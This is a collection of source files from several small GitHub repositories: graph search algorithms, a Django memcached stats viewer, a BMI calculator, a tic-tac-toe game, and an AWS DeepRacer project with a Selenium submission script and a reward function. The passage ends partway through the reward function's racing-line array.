9169d932951c3fac49370267554dff5872e81a4e
refs/heads/master
2020-03-29T04:16:31.979251
2018-09-21T11:19:54
2018-09-21T11:19:54
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5953229069709778, "alphanum_fraction": 0.599659264087677, "avg_line_length": 27.19650650024414, "blob_id": "dc24e41445912ce63261194f2674ba5ef3f39a97", "content_id": "23fb33ba56db147723c5a0b1da416ec97a16785b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6457, "license_type": "permissive", "max_line_length": 96, "num_lines": 229, "path": "/main.py", "repo_name": "wahaaabello/search-algorithms", "src_encoding": "UTF-8", "text": "from collections import deque\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.adjacent_nodes = set()\n\n def add_adjacent_node(self, node):\n self.adjacent_nodes.add(node)\n\n @staticmethod\n def connect_nodes(node1, node2):\n node1.add_adjacent_node(node2)\n node2.add_adjacent_node(node1)\n\n\ndef depth_first_search(startNode, goal):\n visited, open_list = set(), [startNode]\n while len(open_list) > 0:\n current_node = open_list.pop()\n if current_node.value == goal:\n return current_node\n open_list.extend(current_node.adjacent_nodes - visited)\n visited.add(current_node)\n return False\n\n\ndef depth_limited_search(startNode, goal, max_depth):\n visited, open_list = set(), [(startNode, 0)]\n while len(open_list) > 0:\n current_node, depth = open_list.pop()\n if current_node.value == goal:\n return current_node\n if depth + 1 <= max_depth:\n open_list.extend([(node, depth + 1)\n for node in current_node.adjacent_nodes - visited])\n visited.add(current_node)\n return False\n\n\ndef iterative_deepening_search(startNode, goal, max_depth):\n for i in range(max_depth + 1):\n output = depth_limited_search(startNode, goal, i)\n if output:\n return output\n\n\ndef breadth_first_search(startNode, goal):\n visited, open_list = set(), deque([startNode])\n while len(open_list) > 0:\n current_node = open_list.popleft()\n if current_node.value == goal:\n return current_node\n open_list.extend(current_node.adjacent_nodes - visited)\n visited.add(current_node)\n return False\n\n\ndef bidirectional_search(startNode, goalNode):\n visited_for_root_search = set()\n visited_for_goal_search = set()\n open_list_for_root_search = deque([(startNode, [startNode])])\n open_list_for_goal_search = deque([(goalNode, [goalNode])])\n\n while len(open_list_for_root_search) > 0 and len(open_list_for_goal_search) > 0:\n print\n\n current_node_for_root_search, path_for_root_search = open_list_for_root_search.popleft()\n current_node_for_goal_search, path_for_goal_search = open_list_for_goal_search.popleft()\n\n node_children_for_root_search = current_node_for_root_search.adjacent_nodes - \\\n visited_for_root_search\n open_list_for_root_search.extend(\n [(child, path_for_root_search+[child]) for child in node_children_for_root_search])\n visited_for_root_search.add(current_node_for_root_search)\n\n node_children_for_goal_search = current_node_for_goal_search.adjacent_nodes - \\\n visited_for_goal_search\n open_list_for_goal_search.extend(\n [(child, path_for_goal_search+[child]) for child in node_children_for_goal_search])\n visited_for_goal_search.add(current_node_for_goal_search)\n\n if visited_for_root_search & visited_for_goal_search:\n # return the path from root to goal\n return path_for_root_search + path_for_goal_search[-2::-1]\n return False\n\n\ndef uniform_cost_search(startNode, edge_costs, goal):\n visited, open_list = set(), [(startNode, [startNode], 0)]\n while len(open_list) > 0:\n current_node, path, cost = open_list.pop()\n if current_node.value == goal:\n return path, cost\n\n for node in current_node.adjacent_nodes - visited:\n node_path = path[:]\n node_path.append(node)\n node_cost = edge_costs[(current_node, node)]\n open_list.append((node, node_path, cost + node_cost))\n\n open_list.sort(key=lambda key: key[2], reverse=True)\n visited.add(current_node)\n return False\n\n\ndef best_first_search():\n pass\n\n\ndef a_star_search():\n pass\n\n\ndef hill_climbing_search():\n pass\n\n\ndef simulated_annealing():\n pass\n\n\ndef tabu_search():\n pass\n\n\ndef grapth_coloring():\n pass\n\n\ndef initial_graph():\n A = Node('A')\n B = Node('B')\n C = Node('C')\n D = Node('D')\n E = Node('E')\n F = Node('F')\n G = Node('G')\n H = Node('H')\n I = Node('I')\n J = Node('J')\n K = Node('K')\n Node.connect_nodes(A, B)\n Node.connect_nodes(A, C)\n Node.connect_nodes(B, D)\n Node.connect_nodes(B, E)\n Node.connect_nodes(C, F)\n Node.connect_nodes(C, G)\n Node.connect_nodes(D, H)\n Node.connect_nodes(D, I)\n Node.connect_nodes(E, J)\n Node.connect_nodes(E, K)\n return A\n\n\ndef initial_graph_for_bidirectional_search():\n A = Node('A')\n B = Node('B')\n C = Node('C')\n D = Node('D')\n E = Node('E')\n F = Node('F')\n G = Node('G')\n H = Node('H')\n I = Node('I')\n J = Node('J')\n K = Node('K')\n L = Node('L')\n M = Node('M')\n N = Node('N')\n Node.connect_nodes(A, B)\n Node.connect_nodes(A, C)\n Node.connect_nodes(B, D)\n Node.connect_nodes(B, E)\n Node.connect_nodes(C, F)\n Node.connect_nodes(D, G)\n Node.connect_nodes(E, H)\n Node.connect_nodes(F, H)\n Node.connect_nodes(G, I)\n Node.connect_nodes(H, J)\n Node.connect_nodes(H, K)\n Node.connect_nodes(I, L)\n Node.connect_nodes(J, L)\n Node.connect_nodes(K, M)\n Node.connect_nodes(L, N)\n Node.connect_nodes(M, N)\n return A, N\n\n\ndef initial_graph_for_uniform_cost_search():\n A = Node('A')\n B = Node('B')\n C = Node('C')\n D = Node('D')\n E = Node('E')\n\n Node.connect_nodes(A, B)\n Node.connect_nodes(A, C)\n Node.connect_nodes(A, D)\n Node.connect_nodes(B, E)\n Node.connect_nodes(C, E)\n Node.connect_nodes(D, E)\n\n edge_costs = {}\n edge_costs[(A, B)] = 5\n edge_costs[(A, C)] = 1\n edge_costs[(A, D)] = 2\n edge_costs[(B, E)] = 1\n edge_costs[(C, E)] = 7\n edge_costs[(D, E)] = 5\n return A, edge_costs\n\n\nif __name__ == '__main__':\n # root = initial_graph()\n # output = depth_first_search(root, 'G')\n # output = depth_limited_search(root, 'G', 2)\n # output = iterative_deepening_search(root, 'G', 2)\n # output = breadth_first_search(root, 'G')\n # print(output.value) if output else print(output)\n\n # root, goalNode = initial_graph_for_bidirectional_search()\n # output_path = bidirectional_search(root, goalNode)\n # print([node.value for node in output_path])\n\n # root, edge_costs = initial_graph_for_uniform_cost_search()\n # output_path, cost = uniform_cost_search(root, edge_costs, 'E')\n # print([node.value for node in output_path], cost)\n" }, { "alpha_fraction": 0.8239436745643616, "alphanum_fraction": 0.8239436745643616, "avg_line_length": 70, "blob_id": "2f3f9fcfdc985711644cf10d8fcb21908ae53ee5", "content_id": "2bbc8cfc4a365593d7a8df425884c8ec36016b21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "permissive", "max_line_length": 121, "num_lines": 2, "path": "/README.md", "repo_name": "wahaaabello/search-algorithms", "src_encoding": "UTF-8", "text": "# search-algorithms\nImplementation of uninformed and informed search algorithms from 'ARTIFICIAL INTELLIGENCE - A Systems Approach' by M. TIM JONES\n" } ]
2
edavis/django-cache-stats
https://github.com/edavis/django-cache-stats
6e776cca27256e375ee9b720be513eed83d2b4ea
2ed68847abf38f0a5d089343e1ae15ba5e36d625
16a4b5d6d4882e7db8f75c0c8438d073424357d4
refs/heads/master
2016-09-05T09:55:17.495324
2011-06-23T19:01:22
2011-06-23T19:01:22
1,938,593
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6344605684280396, "alphanum_fraction": 0.6376811861991882, "avg_line_length": 27.227272033691406, "blob_id": "4040782cc7aac81472657a9fd2b5c4e4848bb1d4", "content_id": "e19188a4dad57c5be90d222d75192689debe69e3", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "permissive", "max_line_length": 55, "num_lines": 22, "path": "/setup.py", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='django-cache-stats',\n version=\"0.1-dev\",\n description=\"Monitor your memcached servers\",\n long_description=open('README.rst').read(),\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Django\",\n \"Environment :: Web Environment\",\n ],\n keywords='memcached,django',\n author='Eric Davis',\n author_email='[email protected]',\n url='http://github.com/edavis/django-cache-stats/',\n license='BSD',\n packages=find_packages(),\n zip_safe=False,\n install_requires=['setuptools'],\n include_package_data=True,\n)\n" }, { "alpha_fraction": 0.5545454621315002, "alphanum_fraction": 0.557851254940033, "avg_line_length": 27.13953399658203, "blob_id": "de954c45014eb835706e693cc6615a3d8389931d", "content_id": "4bf612f5e843b4e2dc15c5b96b201098f1dbb63d", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "permissive", "max_line_length": 81, "num_lines": 43, "path": "/cache_stats/util.py", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "import datetime\nfrom decimal import Decimal\nfrom django.core.cache import cache\n\ndef get_stats():\n c = cache._cache\n stats = dict(c.get_stats())\n servers = stats.keys()\n\n conversion_map = {\n \"uptime\": lambda n: datetime.timedelta(seconds=int(n)),\n \"rusage_system\": Decimal,\n \"rusage_user\": Decimal,\n \"time\": lambda n: datetime.datetime.fromtimestamp(int(n)),\n }\n\n cache_hosts = {}\n\n for server in servers:\n cache_hosts[server] = {}\n info = stats[server].copy()\n\n for k, v in info.items():\n func = conversion_map.get(k)\n\n if func is not None:\n info[k] = func(v)\n\n elif v.isdigit():\n info[k] = int(v)\n\n try:\n info[\"hit_rate\"] = 100.0 * info[\"get_hits\"] / float(info[\"cmd_get\"])\n except ZeroDivisionError:\n info[\"hit_rate\"] = info[\"get_hits\"]\n\n info[\"gets_per_second\"] = info[\"cmd_get\"] / float(info[\"uptime\"].seconds)\n info[\"sets_per_second\"] = info[\"cmd_set\"] / float(info[\"uptime\"].seconds)\n info[\"started_at\"] = datetime.datetime.now() - info[\"uptime\"]\n\n cache_hosts[server].update(info)\n\n return cache_hosts\n" }, { "alpha_fraction": 0.7719594836235046, "alphanum_fraction": 0.7719594836235046, "avg_line_length": 33.82352828979492, "blob_id": "6445bdae5a012e0b7e4f7675a2ffbcecd08e3385", "content_id": "8c88dd0bf4df749ada7c622427a88b0989739bfa", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 592, "license_type": "permissive", "max_line_length": 69, "num_lines": 17, "path": "/cache_stats/views.py", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "import datetime\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.core.cache import cache\nfrom django.shortcuts import render\nfrom django.template import RequestContext\nfrom django.views.decorators.cache import never_cache\nfrom .util import get_stats\n\n@never_cache\ndef server_list(request):\n context = {\"stats\": get_stats()}\n return render(\n request, \"memcached/server_list.html\", context)\n\nif getattr(settings, 'DJANGO_MEMCACHED_REQUIRE_STAFF', False):\n server_list = user_passes_test(lambda u: u.is_staff)(server_list)\n" }, { "alpha_fraction": 0.5412843823432922, "alphanum_fraction": 0.5412843823432922, "avg_line_length": 20.799999237060547, "blob_id": "8e79806bf3084cd8a7453e7ad8c788ff338c4a10", "content_id": "1f265ed44bdee008b4160310b12d87bf279a0d8c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 109, "license_type": "permissive", "max_line_length": 50, "num_lines": 5, "path": "/README.rst", "repo_name": "edavis/django-cache-stats", "src_encoding": "UTF-8", "text": "==================\ndjango-cache-stats\n==================\n\nMonitor the utilization of your memcached servers.\n" } ]
4
Gauravbisht1/Games
https://github.com/Gauravbisht1/Games
de3b291092b05c497cf7688323ea32cbefd8776b
7ae58dff1e8ce23ceac96256de7e036002654a00
80cbf12eb71b8436e4ee67adc885f557c78eea5c
refs/heads/main
2023-08-16T05:30:15.694468
2021-10-02T02:57:55
2021-10-02T02:57:55
412,673,928
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.4789816439151764, "alphanum_fraction": 0.5106571912765503, "avg_line_length": 35.71739196777344, "blob_id": "b21bf0507d6bce58478289ab5270de045e160781", "content_id": "cc44d9729413569cbad00d2d0053affaf48ab09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3378, "license_type": "no_license", "max_line_length": 105, "num_lines": 92, "path": "/Tic-Tac-Toe.py", "repo_name": "Gauravbisht1/Games", "src_encoding": "UTF-8", "text": "def speak(str):\n from win32com.client import Dispatch\n\n speak = Dispatch(\"SAPI.SpVoice\")\n speak.Speak(str)\n\nmyboard={1:' ',2:' ',3:' ',4:' ',5:' ',6:' ',7:' ',8:' ',9:' '}\ndef printboard():\n\n print(f\"{str(myboard.get(1,'+'))} | {str(myboard.get(2,'+'))} | {str(myboard.get(3,'+'))}\")\n print(\"__|___|____\")\n print(f\"{str(myboard.get(4,'+'))} | {str(myboard.get(5,'+'))} | {str(myboard.get(6,'+'))}\")\n print(\"__|___|__\")\n print(f\"{str(myboard.get(7,'+'))} | {str(myboard.get(8,'+'))} | {str(myboard.get(9,'+'))}\")\n print(\"__|___|__\")\n\ndef changes(num,inputs):\n myboard[num]=inputs\n\nif __name__==\"__main__\":\n printboard()\n speak(\"Enter First player name\")\n player1=input(\"Enter First player name --> \").title()\n speak(\"Enter Second player name\")\n player2=input(\"Enter Second player name --> \").title()\n i=0\n import pyinputplus as hup\n win=True\n while i<10000:\n if i%2==0:\n speak(f\"hey {player1},enter your number\")\n print(player1,\"---->\", end=' ')\n try:\n num1 = hup.inputNum(min=1, lessThan = 10)\n if myboard[num1] == 'X' or myboard[num1] == 'O':\n speak(\"this spot is already filled, try again\")\n print(\"this spot is already filled, try again\\n\")\n continue\n except:\n continue\n else:\n changes(num1,'X')\n i = i + 1\n printboard()\n\n elif i%2!=0:\n speak(f\"hey {player2},enter your number\")\n print(player2,\"---->\",end=' ')\n try:\n num2 = hup.inputNum(min=1,lessThan=10)\n if myboard[num2] == 'X' or myboard[num2] == 'O':\n speak(\"this spot is already filled, try again\")\n print(\"this spot is already filled, try again\\n\")\n continue\n\n except:\n continue\n else:\n changes(num2,'O')\n i = i + 1\n printboard()\n\n\n\n if (myboard[1] == myboard[2] == myboard[3] =='X' or myboard[1] == myboard[2] == myboard[3] == 'O' or\n myboard[4] == myboard[5] == myboard[6]=='X' or myboard[4] == myboard[5] == myboard[6] == 'O' or\n myboard[7] == myboard[8] == myboard[9]=='X' or myboard[7] == myboard[8] == myboard[9]=='O' or\n myboard[1] == myboard[4] == myboard[7]=='X' or myboard[1] == myboard[4] == myboard[7]=='O' or\n myboard[2] == myboard[5] == myboard[8]=='X' or myboard[2] == myboard[5] == myboard[8]=='O' or\n myboard[3] == myboard[6] == myboard[9]=='X' or myboard[3] == myboard[6] == myboard[9]=='O' or\n myboard[1] == myboard[5] == myboard[9]=='X' or myboard[1] == myboard[5] == myboard[9]=='O' or\n myboard[3] == myboard[5] == myboard[7]=='X' or myboard[3] == myboard[5] == myboard[7]=='O'):\n if (i+1)%2==0:\n print(f\"{player1} won the game\")\n speak(f\"{player1} won the game\")\n else:\n print(f\"{player2} won the game\")\n speak(f\"{player2} won the game\")\n break\n\n elif (' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values() and\n ' ' not in myboard.values()):\n print(\"Match Draw\")\n speak(\"Match Draw\")\n break\n" } ]
1
z4yed/BMI-Calculator-Django-Jquery
https://github.com/z4yed/BMI-Calculator-Django-Jquery
c894df527732006eaa07363617d7216a17bee94a
fb9deeca9ca8a8e2eb35f59560cded3b3e163017
6af93f444c7b3f5772a72ee28c94c5256545dc65
refs/heads/master
2023-02-02T02:09:32.248783
2020-12-18T09:20:20
2020-12-18T09:20:20
322,543,437
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6600000262260437, "alphanum_fraction": 0.6600000262260437, "avg_line_length": 17.75, "blob_id": "43d8603f85de9dd3ab938b7e874d680154b9c03c", "content_id": "67d86bdee7c9fe92c78e4a9d76558b438e57578a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 150, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/calc/urls.py", "repo_name": "z4yed/BMI-Calculator-Django-Jquery", "src_encoding": "UTF-8", "text": "from django.urls import path, include\nfrom . import views\n\napp_name = 'calc'\n\nurlpatterns = [\n path('', views.HomeView.as_view(), name='home'),\n]\n" }, { "alpha_fraction": 0.6222222447395325, "alphanum_fraction": 0.6222222447395325, "avg_line_length": 19.846153259277344, "blob_id": "1c3abf3ccf7d4a60f4c87567f9a48423fb7b8ff1", "content_id": "7578c15102fc4a88ede6a0378c8a99c96c41edcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 57, "num_lines": 13, "path": "/calc/views.py", "repo_name": "z4yed/BMI-Calculator-Django-Jquery", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.views import View\n\n# Create your views here.\n\n\nclass HomeView(View):\n def get(self, request):\n\n context = {\n 'message': \"hi there. \",\n }\n return render(request, 'calc/home.html', context)" }, { "alpha_fraction": 0.7516129016876221, "alphanum_fraction": 0.7548387050628662, "avg_line_length": 33.44444274902344, "blob_id": "d6343fc973e8087ccc2b171dd358b334486964f4", "content_id": "1d0f8c8e816c651c5292a5b5876e25a650849ed7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 310, "license_type": "no_license", "max_line_length": 79, "num_lines": 9, "path": "/README.md", "repo_name": "z4yed/BMI-Calculator-Django-Jquery", "src_encoding": "UTF-8", "text": "# BMI-Calculator-Django-Jquery\nThis is a simple BMI calculator. \n\n## Create a virtualenvironment & activate it. Then Run the following commands :\n\n* $ pip install django\n* $ git clone https://github.com/z4yed/BMI-Calculator-Django-Jquery.git\n* $ cd BMI-Calculator-Django-Jquery/\n* $ python manage.py runserver\n" } ]
3
rheehot/Capstone_AWS_DeepRacer
https://github.com/rheehot/Capstone_AWS_DeepRacer
843fd3d79fcc5fff82fcf11b5abfb5ae55869b38
fac82d2c40bb48ecd984d69ba3f111b9c5c7863b
e5f54207e0f7ef67ad0fc914c09f567167aacea7
refs/heads/master
2023-01-03T13:05:49.281243
2020-11-03T17:39:33
2020-11-03T17:39:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6464226245880127, "alphanum_fraction": 0.6741541624069214, "avg_line_length": 35.42424392700195, "blob_id": "d715a151c59c0f0060d2e8c4c632b7841251762c", "content_id": "86c49cdc0a9501900ac5d479e5e72dff752d34f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3606, "license_type": "no_license", "max_line_length": 194, "num_lines": 99, "path": "/Selenium_Automation/lambda_function.py", "repo_name": "rheehot/Capstone_AWS_DeepRacer", "src_encoding": "UTF-8", "text": "import os, time, json\n\nfrom datetime import datetime, timedelta\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium import webdriver\n\nMODEL_NAME = \"Capstone-T1008-A7-A6\"\nSUBMIT_URL = \"https://console.aws.amazon.com/deepracer/home?region=us-east-1#competition/arn%3Aaws%3Adeepracer%3A%3A968005369378%3Aleaderboard%2F35b3d210-5aca-4f4e-8247-89f19fbf4d4a/submitModel\"\n\n\ndef get_driver():\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--window-size=1280x720')\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--hide-scrollbars')\n chrome_options.add_argument('--enable-logging')\n chrome_options.add_argument('--log-level=0')\n chrome_options.add_argument('--v=99')\n chrome_options.add_argument('--single-process')\n chrome_options.add_argument('--homedir=/tmp')\n chrome_options.add_argument('--user-data-dir=/tmp/user-data')\n chrome_options.add_argument('--data-path=/tmp/data-path')\n chrome_options.add_argument('--disk-cache-dir=/tmp/cache-dir')\n chrome_options.add_argument('--ignore-certificate-errors')\n chrome_options.add_argument('user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36')\n chrome_options.binary_location = \"/opt/python/bin/headless-chromium\"\n\n driver = webdriver.Chrome('/opt/python/bin/chromedriver', chrome_options=chrome_options)\n return driver\n\n\n# Login AWS Console URL with IAM ID\ndef login_aws_console(browser):\n with open(\"AWS_credentials.txt\", 'r') as f:\n [aws_id, username, password] = f.read().splitlines()\n \n aws_id = str(aws_id)\n url = \"https://%s.signin.aws.amazon.com/console\" % aws_id\n\n browser.get(url)\n browser.refresh()\n time.sleep(3)\n\n usernameInput = browser.find_elements_by_css_selector('form input')[1]\n passwordInput = browser.find_elements_by_css_selector('form input')[2]\n\n usernameInput.send_keys(username)\n passwordInput.send_keys(password)\n passwordInput.send_keys(Keys.ENTER)\n time.sleep(2)\n\n print(f\"Successfully logged in to AWS account number {aws_id} with username {username}\")\n\n\n# Submit deepracer model to community races\ndef submit_model_to_community(browser):\n\n browser.get( SUBMIT_URL )\n browser.refresh()\n time.sleep(8)\n \n browser.find_element_by_xpath('//*[@id=\"awsui-select-0-textbox\"]' ).click()\n time.sleep(2)\n browser.find_element_by_xpath(\"//span[contains(@class, 'awsui-select-option-label') and text() = '\"+MODEL_NAME+\"']\").click()\n time.sleep(1)\n \n submitModelButton = browser.find_element_by_xpath('//button[@type=\"submit\"]/*[text()=\"Submit model\"]')\n\n re_press_submit = 5\n while re_press_submit > 0:\n try:\n submitModelButton.click()\n re_press_submit -= 1\n time.sleep(2)\n except:\n # If click failed, means that submit was successful and we got re-routed to Event starting screen\n re_press_submit = 0\n\n time.sleep(3)\n print(f\"[{(datetime.now() + timedelta(hours=9)).strftime('%Y-%m-%d %H:%M:%S')}] Submitted model : {MODEL_NAME}\")\n \n\ndef lambda_handler(event, context):\n print(\" ================ Starting Function ================ \")\n\n browser = get_driver()\n\n login_aws_console(browser)\n submit_model_to_community(browser)\n\n browser.quit()\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Submitted model' + MODEL_NAME)\n }\n" }, { "alpha_fraction": 0.29543665051460266, "alphanum_fraction": 0.4660643935203552, "avg_line_length": 48.50688171386719, "blob_id": "c4af4b3a38259617fca0cb488a54c5e58d6f2592", "content_id": "2fbddcb43a469c703c971c4bc1230c3f6f03e2d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21585, "license_type": "no_license", "max_line_length": 113, "num_lines": 436, "path": "/Reward_Function/reward_function.py", "repo_name": "rheehot/Capstone_AWS_DeepRacer", "src_encoding": "UTF-8", "text": "import math\n\n\nclass Reward:\n def __init__(self, verbose=False):\n self.first_racingpoint_index = 0 # None\n self.verbose = verbose\n\n def reward_function(self, params):\n\n # Import package (needed for heading)\n # import math\n\n ################## HELPER FUNCTIONS ###################\n\n def dist_2_points(x1, x2, y1, y2):\n return abs(abs(x1-x2)**2 + abs(y1-y2)**2)**0.5\n\n def closest_2_racing_points_index(racing_coords, car_coords):\n\n # Calculate all distances to racing points\n distances = []\n for i in range(len(racing_coords)):\n distance = dist_2_points(x1=racing_coords[i][0], x2=car_coords[0],\n y1=racing_coords[i][1], y2=car_coords[1])\n distances.append(distance)\n\n # Get index of the closest racing point\n closest_index = distances.index(min(distances))\n\n # Get index of the second closest racing point\n distances_no_closest = distances.copy()\n distances_no_closest[closest_index] = 999\n second_closest_index = distances_no_closest.index(\n min(distances_no_closest))\n\n return [closest_index, second_closest_index]\n\n def dist_to_racing_line(closest_coords, second_closest_coords, car_coords):\n\n # Calculate the distances between 2 closest racing points\n a = abs(dist_2_points(x1=closest_coords[0],\n x2=second_closest_coords[0],\n y1=closest_coords[1],\n y2=second_closest_coords[1]))\n\n # Distances between car and closest and second closest racing point\n b = abs(dist_2_points(x1=car_coords[0],\n x2=closest_coords[0],\n y1=car_coords[1],\n y2=closest_coords[1]))\n c = abs(dist_2_points(x1=car_coords[0],\n x2=second_closest_coords[0],\n y1=car_coords[1],\n y2=second_closest_coords[1]))\n\n # Calculate distance between car and racing line (goes through 2 closest racing points)\n # try-except in case a=0 (rare bug in DeepRacer)\n try:\n distance = abs(-(a**4) + 2*(a**2)*(b**2) + 2*(a**2)*(c**2) -\n (b**4) + 2*(b**2)*(c**2) - (c**4))**0.5 / (2*a)\n except:\n distance = b\n\n return distance\n\n # Calculate which one of the closest racing points is the next one and which one the previous one\n def next_prev_racing_point(closest_coords, second_closest_coords, car_coords, heading):\n\n # Virtually set the car more into the heading direction\n heading_vector = [math.cos(math.radians(\n heading)), math.sin(math.radians(heading))]\n new_car_coords = [car_coords[0]+heading_vector[0],\n car_coords[1]+heading_vector[1]]\n\n # Calculate distance from new car coords to 2 closest racing points\n distance_closest_coords_new = dist_2_points(x1=new_car_coords[0],\n x2=closest_coords[0],\n y1=new_car_coords[1],\n y2=closest_coords[1])\n distance_second_closest_coords_new = dist_2_points(x1=new_car_coords[0],\n x2=second_closest_coords[0],\n y1=new_car_coords[1],\n y2=second_closest_coords[1])\n\n if distance_closest_coords_new <= distance_second_closest_coords_new:\n next_point_coords = closest_coords\n prev_point_coords = second_closest_coords\n else:\n next_point_coords = second_closest_coords\n prev_point_coords = closest_coords\n\n return [next_point_coords, prev_point_coords]\n\n def racing_direction_diff(closest_coords, second_closest_coords, car_coords, heading):\n\n # Calculate the direction of the center line based on the closest waypoints\n next_point, prev_point = next_prev_racing_point(closest_coords,\n second_closest_coords,\n car_coords,\n heading)\n\n # Calculate the direction in radius, arctan2(dy, dx), the result is (-pi, pi) in radians\n track_direction = math.atan2(\n next_point[1] - prev_point[1], next_point[0] - prev_point[0])\n\n # Convert to degree\n track_direction = math.degrees(track_direction)\n\n # Calculate the difference between the track direction and the heading direction of the car\n direction_diff = abs(track_direction - heading)\n if direction_diff > 180:\n direction_diff = 360 - direction_diff\n\n return direction_diff\n\n # Gives back indexes that lie between start and end index of a cyclical list\n # (start index is included, end index is not)\n def indexes_cyclical(start, end, array_len):\n\n if end < start:\n end += array_len\n\n return [index % array_len for index in range(start, end)]\n\n # Calculate how long car would take for entire lap, if it continued like it did until now\n def projected_time(first_index, closest_index, step_count, times_list):\n\n # Calculate how much time has passed since start\n current_actual_time = (step_count-1) / 15\n\n # Calculate which indexes were already passed\n indexes_traveled = indexes_cyclical(\n first_index, closest_index, len(times_list))\n\n # Calculate how much time should have passed if car would have followed optimals\n current_expected_time = sum(\n [times_list[i] for i in indexes_traveled])\n\n # Calculate how long one entire lap takes if car follows optimals\n total_expected_time = sum(times_list)\n\n # Calculate how long car would take for entire lap, if it continued like it did until now\n try:\n projected_time = (current_actual_time /\n current_expected_time) * total_expected_time\n except:\n projected_time = 9999\n\n return projected_time\n\n #################### RACING LINE ######################\n\n # Optimal racing line for the Spain track\n # Each row: [x,y,speed,timeFromPreviousPoint]\n racing_track = [[0.62634, 2.8074, 1.39727, 0.08294],\n [0.63146, 2.69136, 1.39727, 0.08313],\n [0.64573, 2.57592, 1.39727, 0.08325],\n [0.6693, 2.46191, 1.39727, 0.08332],\n [0.70225, 2.35016, 1.39793, 0.08334],\n [0.74435, 2.24144, 1.30233, 0.08952],\n [0.79504, 2.13627, 1.1967, 0.09756],\n [0.8534, 2.03486, 1.1967, 0.09777],\n [0.9192, 1.93766, 1.1967, 0.09808],\n [0.99249, 1.84529, 1.1967, 0.09854],\n [1.0736, 1.75861, 1.1967, 0.0992],\n [1.16374, 1.67942, 1.1967, 0.10026],\n [1.26415, 1.6102, 1.5021, 0.08119],\n [1.37092, 1.54793, 1.67335, 0.07386],\n [1.48281, 1.49161, 1.88198, 0.06656],\n [1.5988, 1.44025, 2.07512, 0.06113],\n [1.71827, 1.39312, 2.33596, 0.05498],\n [1.84068, 1.34942, 2.5, 0.05199],\n [1.96573, 1.30848, 2.5, 0.05263],\n [2.09321, 1.26959, 2.5, 0.05331],\n [2.22333, 1.23214, 2.5, 0.05416],\n [2.35625, 1.19189, 2.5, 0.05555],\n [2.4887, 1.14987, 2.5, 0.05558],\n [2.62059, 1.10626, 2.5, 0.05557],\n [2.75193, 1.0611, 2.5, 0.05555],\n [2.88273, 1.01446, 2.5, 0.05555],\n [3.01302, 0.96644, 2.5, 0.05554],\n [3.14289, 0.91728, 2.5, 0.05555],\n [3.27245, 0.86725, 2.34643, 0.05919],\n [3.40179, 0.81664, 2.14705, 0.06469],\n [3.52534, 0.76803, 1.99968, 0.0664],\n [3.64883, 0.72099, 1.88636, 0.07005],\n [3.77225, 0.67658, 1.79873, 0.07292],\n [3.89566, 0.63577, 1.73281, 0.07501],\n [4.01913, 0.59935, 1.68666, 0.07632],\n [4.14273, 0.56803, 1.6591, 0.07686],\n [4.26652, 0.5424, 1.64913, 0.07666],\n [4.39051, 0.52303, 1.64913, 0.07609],\n [4.51466, 0.51041, 1.64913, 0.07567],\n [4.6389, 0.50498, 1.64913, 0.07541],\n [4.76312, 0.50709, 1.64913, 0.07534],\n [4.8872, 0.517, 1.64913, 0.07548],\n [5.01096, 0.53487, 1.65562, 0.07553],\n [5.13423, 0.56074, 1.67726, 0.07509],\n [5.2568, 0.59459, 1.71258, 0.07425],\n [5.37847, 0.63625, 1.75997, 0.07307],\n [5.49902, 0.68552, 1.81781, 0.07164],\n [5.61825, 0.74209, 1.88447, 0.07003],\n [5.73595, 0.80562, 1.95841, 0.0683],\n [5.85194, 0.87573, 2.03816, 0.0665],\n [5.96605, 0.95201, 2.12234, 0.06467],\n [6.07813, 1.03404, 2.20965, 0.06286],\n [6.18805, 1.1214, 2.29886, 0.06108],\n [6.2957, 1.21366, 2.38874, 0.05935],\n [6.40099, 1.31043, 2.47805, 0.05771],\n 